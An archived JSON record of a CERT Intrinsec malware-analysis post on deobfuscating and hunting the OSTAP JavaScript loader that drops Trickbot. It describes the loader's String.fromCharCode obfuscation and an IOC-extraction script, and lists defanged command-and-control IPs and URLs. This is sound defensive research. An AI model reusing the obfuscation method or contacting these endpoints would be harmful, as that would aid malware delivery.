{
	"id": "4a6ad11f-5138-4ad0-b307-24d7b43def1b",
	"created_at": "2026-04-06T00:13:11.803037Z",
	"updated_at": "2026-04-10T13:11:19.445331Z",
	"deleted_at": null,
	"sha1_hash": "e35664044820f76cc945d04d7512f74475962266",
	"title": "Deobfuscating and hunting for OSTAP, Trickbot’s dropper and best friend",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 61083,
	"plain_text": "Deobfuscating and hunting for OSTAP, Trickbot’s dropper and\r\nbest friend\r\nBy Equipe CERT\r\nPublished: 2020-04-14 · Archived: 2026-04-05 22:57:02 UTC\r\n[et_pb_section fb_built=”1″ admin_label=”section” _builder_version=”3.22″][et_pb_row admin_label=”row”\r\n_builder_version=”3.25″ background_size=”initial” background_position=”top_left” background_repeat=”repeat”\r\ncustom_margin=”|auto|-2px|auto||”][et_pb_column type=”4_4″ _builder_version=”3.25″ custom_padding=”|||”\r\ncustom_padding__hover=”|||”][et_pb_text admin_label=”Text” _builder_version=”4.4.2″ text_font=”Nunito\r\nSans||||||||” text_font_size=”16px” header_2_font=”Poppins||||||||” header_2_text_color=”#071793″\r\nheader_2_font_size=”31px” background_size=”initial” background_position=”top_left”\r\nbackground_repeat=”repeat” custom_padding=”||0px|||”]\r\nDuring a recent investigation dealing with ransomware attack, CERT Intrinsec faced OSTAP loader. This\r\nloader is used to deliver other malwares (such as Trickbot) on an infected system. It uses high obfuscation\r\ntechniques to prevent the code from being read and to bypass detection processes.\r\nObfuscated loader\r\n[/et_pb_text][et_pb_image src=\"https://www.intrinsec.com/wp-content/uploads/2020/04/fig1-1.png\"\r\n_builder_version=\"4.4.2\"][/et_pb_image][et_pb_text _builder_version=\"4.4.2\"]\r\nFigure 1 : Extract of the loader code (Javascript)\r\n[/et_pb_text][et_pb_text admin_label=”Text” _builder_version=”4.4.2″ text_font=”Nunito Sans||||||||”\r\ntext_font_size=”16px” header_2_font=”Poppins||||||||” header_2_text_color=”#071793″\r\nheader_2_font_size=”31px” background_size=”initial” background_position=”top_left”\r\nbackground_repeat=”repeat”]\r\nThe ostap loader (Figure 1) we analysed was about 10 000 lines long. We started the static analysis by going\r\nthrough the code by hand to understand its structure. We identified a key part of the code that helped us to\r\ndeobfuscate the loader (Figure 2).\r\n[/et_pb_text][et_pb_image src=\"https://www.intrinsec.com/wp-content/uploads/2020/04/fig2-1.png\"\r\n_builder_version=\"4.4.2\"][/et_pb_image][et_pb_text _builder_version=\"4.4.2\"]\r\nFigure 2 : Key part of the loader code\r\n[/et_pb_text][et_pb_text admin_label=”Text” _builder_version=”4.4.2″ text_font=”Nunito Sans||||||||”\r\ntext_font_size=”16px” header_2_font=”Poppins||||||||” header_2_text_color=”#071793″\r\nheader_2_font_size=”31px” background_size=”initial” background_position=”top_left”\r\nbackground_repeat=”repeat”]\r\nhttps://www.intrinsec.com/deobfuscating-hunting-ostap/\r\nPage 1 of 4\n\nThe instructions, on Figure 2, aim at executing String.fromCharCode function ewnfBeth8 parameter. There are\r\nlots of noise instructions in the program. For example, ppfhair_3(ewnfBeth8) instruction in try statement will\r\nnever be triggered because the function does not exist. It is done on purpose to always enter the catch. Besides,\r\netvulike2 parameter is always equal to ‘f’. A large part of the program consists of a concatenation of functions\r\nsuch as the one shown on Figure 3.\r\n[/et_pb_text][et_pb_image src=\"https://www.intrinsec.com/wp-content/uploads/2020/04/fig3-1.png\"\r\n_builder_version=\"4.4.2\"][/et_pb_image][et_pb_text _builder_version=\"4.4.2\"]\r\n Figure 3 : Repeated function model\r\n[/et_pb_text][et_pb_text admin_label=”Text” _builder_version=”4.4.2″ text_font=”Nunito Sans||||||||”\r\ntext_font_size=”16px” header_2_font=”Poppins||||||||” header_2_text_color=”#071793″\r\nheader_2_font_size=”31px” background_size=”initial” background_position=”top_left”\r\nbackground_repeat=”repeat” custom_padding=”|||1px||”]\r\nThe action of the function above (Figure 3) is to apply String.fromCharCode to 69, i.e. « E ». The program uses\r\nthis method to set all its instructions. Knowing that, we decided to write a script to extract each obfuscated\r\ncharacter.\r\n[/et_pb_text][et_pb_text admin_label=”Text” _builder_version=”4.4.2″ text_font=”Nunito Sans||||||||”\r\ntext_font_size=”16px” header_2_font=”Poppins||||||||” header_2_text_color=”#071793″\r\nheader_2_font_size=”31px” background_size=”initial” background_position=”top_left”\r\nbackground_repeat=”repeat” custom_padding=”|||1px||”]\r\n Deobfuscation script\r\n The main goal of the script is to get indicators of compromise from the loader. It has been developed using\r\nNode JS. It first goes through the obfuscated loader, retrieves the targeted numbers and apply\r\nString.fromCharCode to decode them. Then, it collects the indicators of compromise in the decoded payload using\r\nregular expressions. Extracted IOCs are IPs, URLs and User-Agents. The figure below represents the output of the\r\nscript using a sample hunted on VirusTotal. We can see, at the top of Figure 4, a list of file extensions that are\r\ntargeted (their content will be replaced by the Ostap JS code).\r\n[/et_pb_text][et_pb_image src=\"https://www.intrinsec.com/wp-content/uploads/2020/04/fig4.png\"\r\n_builder_version=\"4.4.2\"][/et_pb_image][et_pb_text _builder_version=\"4.4.2\"]\r\nFigure 4 : Script execution output\r\n[/et_pb_text][et_pb_text admin_label=”Text” _builder_version=”4.4.2″ text_font=”Nunito Sans||||||||”\r\ntext_font_size=”16px” header_2_font=”Poppins||||||||” header_2_text_color=”#071793″\r\nheader_2_font_size=”31px” background_size=”initial” background_position=”top_left”\r\nbackground_repeat=”repeat”]\r\nHunting \r\nhttps://www.intrinsec.com/deobfuscating-hunting-ostap/\r\nPage 2 of 4\n\nAfter deobfuscating the loader as a part of our investigation, we decided to hunt recent and similar files on\r\nVirusTotal, using searches on static code patterns (content: “‘String’)[‘slice’]”, for instance). We found lots of\r\nsamples (Figure 5) and process them so as to extract as many IOCs as possible.\r\n[/et_pb_text][et_pb_image src=\"https://www.intrinsec.com/wp-content/uploads/2020/04/fig5-1.png\"\r\n_builder_version=\"4.4.2\"][/et_pb_image][et_pb_text _builder_version=\"4.4.2\"]\r\n Figure 5 : Ostap samples from VirusTotal\r\n[/et_pb_text][et_pb_text admin_label=”Text” _builder_version=”4.4.2″ text_font=”Nunito Sans||||||||”\r\ntext_font_size=”16px” header_2_font=”Poppins||||||||” header_2_text_color=”#071793″\r\nheader_2_font_size=”31px” background_size=”initial” background_position=”top_left”\r\nbackground_repeat=”repeat”]\r\nWe collected about 140 samples from VirusTotal using the script. We analysed them and extracted the\r\nindicators of compromise presented in the table below. We can say that at least one of the IP addresses\r\n(185[.]234[.]73[.]125) is related to the Trickbot campaign happening since the Coronavirus appeared such\r\nas in Italy, as reported by Sophos (1).\r\n[/et_pb_text][et_pb_text _builder_version=”4.4.2″ hover_enabled=”0″]\r\nIP URL User-Agent\r\n141[.]98[.]214[.]14\r\n185[.]159[.]82[.]205\r\n185[.]216[.]35[.]10\r\n185[.]234[.]73[.]125\r\n194[.]87[.]96[.]100\r\n45[.]128[.]133[.]41\r\n91[.]196[.]70[.]126\r\nhxxps[://]141[.]98[.]214[.]14/6BcsTO/AGVV5r[.]php\r\nhxxps[://]185[.]159[.]82[.]205/2/1[.]php\r\nhxxps[://]185[.]216[.]35[.]10/VYut68/L2KSUN[.]php\r\nhxxps[://]185[.]234[.]73[.]125/wMB03o/Wx9u79[.]php\r\nhxxps[://]194[.]87[.]96[.]100/2/1[.]php\r\nhxxp[://]45[.]128[.]133[.]41/jTlp8P/3OXkud[.]php\r\nhxxps[://]91[.]196[.]70[.]126/2/zsQX9M[.]php\r\nMozilla/5.0\r\n(Windows NT 6.; Win64;\r\nx64; Trident/7.0; rv:11.0)\r\nlike Gecko\r\n[/et_pb_text][et_pb_text admin_label=”Text” _builder_version=”4.4.2″ text_font=”Nunito Sans||||||||”\r\ntext_font_size=”16px” header_2_font=”Poppins||||||||” header_2_text_color=”#071793″\r\nheader_2_font_size=”31px” background_size=”initial” background_position=”top_left”\r\nbackground_repeat=”repeat”]\r\nReferences\r\n1. https://news.sophos.com/en-us/2020/03/04/trickbot-campaign-targets-coronavirus-fears-in-italy/\r\nhttps://www.intrinsec.com/deobfuscating-hunting-ostap/\r\nPage 3 of 4\n\n2. https://www.esentire.com/blog/oh-snap-new-ostap-variant-observed-in-the-wild\r\n3. https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/\r\n4. https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/\r\n5. https://github.com/cryptogramfan/Malware-Analysis-Scripts\r\n6. https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\n7. Link to the script on Intrinsec Github :\r\nhttps://github.com/Intrinsec/CERT/tree/master/Scripts/ostap_deobfuscator\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=”1″ _builder_version=”4.4.2″\r\nuse_background_color_gradient=”on” background_color_gradient_start=”#071793″\r\nbackground_color_gradient_end=”rgba(7,23,147,0.59)” custom_margin=”|103px||87px||”][et_pb_row\r\ncolumn_structure=”3_4,1_4″ _builder_version=”3.25″][et_pb_column type=”3_4″ _builder_version=”3.25″\r\ncustom_padding=”|||” custom_padding__hover=”|||”][et_pb_text _builder_version=”4.4.2″ text_font=”Nunito\r\nSans||||||||” text_text_color=”#ffffff” text_font_size=”24px” text_line_height=”1.4em” header_font=”||||||||”\r\nwidth=”101.2%” custom_margin=”-11px|-42px||31px||” custom_padding=”13px||”]\r\nWant to learn more about our Computer Emergency Response Team (CERT) ? \r\n[/et_pb_text][/et_pb_column][et_pb_column type=”1_4″ _builder_version=”3.25″ custom_padding=”|||”\r\ncustom_padding__hover=”|||”][et_pb_button button_url=”https://www.intrinsec.com/cert-intrinsec”\r\nurl_new_window=”on” button_text=”Discover” button_alignment=”left” _builder_version=”4.4.2″\r\ncustom_button=”on” button_text_size=”18px” button_text_color=”#e02b20″ button_bg_color=”#ffffff”\r\nbutton_border_color=”#ffffff” button_font=”Nunito Sans|700|||||||” button_icon=”%%86%%”\r\nbutton_icon_color=”#ffffff” button_icon_placement=”left” custom_margin=”14px|-30px|7px|-6px||”]\r\n[/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]\r\nSource: https://www.intrinsec.com/deobfuscating-hunting-ostap/\r\nhttps://www.intrinsec.com/deobfuscating-hunting-ostap/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.intrinsec.com/deobfuscating-hunting-ostap/"
	],
	"report_names": [
		"deobfuscating-hunting-ostap"
	],
	"threat_actors": [],
	"ts_created_at": 1775434391,
	"ts_updated_at": 1775826679,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e35664044820f76cc945d04d7512f74475962266.pdf",
		"text": "https://archive.orkl.eu/e35664044820f76cc945d04d7512f74475962266.txt",
		"img": "https://archive.orkl.eu/e35664044820f76cc945d04d7512f74475962266.jpg"
	}
}